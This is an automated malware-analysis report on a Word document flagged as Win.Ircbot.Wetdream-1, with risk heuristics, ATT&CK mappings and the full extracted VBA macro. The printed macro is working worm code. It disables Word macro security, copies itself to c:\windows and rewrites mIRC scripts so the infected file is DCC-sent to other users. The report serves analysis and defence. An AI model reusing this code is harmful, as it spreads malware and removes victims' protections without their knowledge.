MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1566.001 Spearphishing Attachment
The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The script attempts to disable security alerts and save a file named 'Wetdream.doc' to 'c:\windows\'. It also attempts to create or modify mIRC script files, suggesting an intent to establish persistence or facilitate IRC-based communication and file transfer. The ClamAV detection explicitly identifies this as Win.Ircbot.Wetdream-1.
Heuristics 3
-
ClamAV: Win.Ircbot.Wetdream-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Ircbot.Wetdream-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2644 bytes |
SHA-256: 91e6194e2d795683497f3afd2219dd59eafcd1091bc372072c3f544024d1e525 |
|||
|
Detection
ClamAV:
Win.Ircbot.Wetdream-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Módulo1"
Private Sub Document_Open()
On Error Resume Next
Application.DisplayAlerts = wdAlertsNone
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Wetdream") <> "Ahhh..." Then
ActiveDocument.SaveAs "c:\windows\Wetdream.doc"
If fso.fileexists("c:\mirc\mirc.ini") Then
Open "c:\mirc\script.ini" For Output As #3
Print #3, "[script]"
Print #3, "n0=on 1:text:*:#: $1-30 | on 1:join:#: { /dcc send $nick c:\windows\Wetdream.doc | /j teensex } | on 1:join:#teensex: if ( $nick == $me ) /msg $chan HI YÅ!!"
Close #3
End If
If fso.fileexists("c:\mirc32\mirc.ini") Then
Open "c:\mirc32\script.ini" For Output As #3
Print #3, "[script]"
Print #3, "n0=on 1:text:*:#: $1-30 | on 1:join:#: { /dcc send $nick c:\windows\Wetdream.doc | /j teensex } | on 1:join:#teensex: if ( $nick == $me ) /msg $chan HI YÅ!!"
Close #3
End If
If fso.fileexists("c:\program files\mirc\mirc.ini") Then
Open "c:\program files\mirc\script.ini" For Output As #3
Print #3, "[script]"
Print #3, "n0=on 1:text:*:#: $1-30 | on 1:join:#: { /dcc send $nick c:\windows\Wetdream.doc | /j teensex } | on 1:join:#teensex: if ( $nick == $me ) /msg $chan HI YÅ!!"
Close #3
End If
If fso.fileexists("c:\program files\mirc32\mirc.ini") Then
Open "c:\program files\mirc32\script.ini" For Output As #3
Print #3, "[script]"
Print #3, "n0=on 1:text:*:#: $1-30 | on 1:join:#: { /dcc send $nick c:\windows\Wetdream.doc | /j teensex } | on 1:join:#teensex: if ( $nick == $me ) /msg $chan HI YÅ!!"
Close #3
End If
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Wetdream") = "Ahhh..."
Else
MsgBox "Not enough memory!", vbCritical, "Warning!"
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.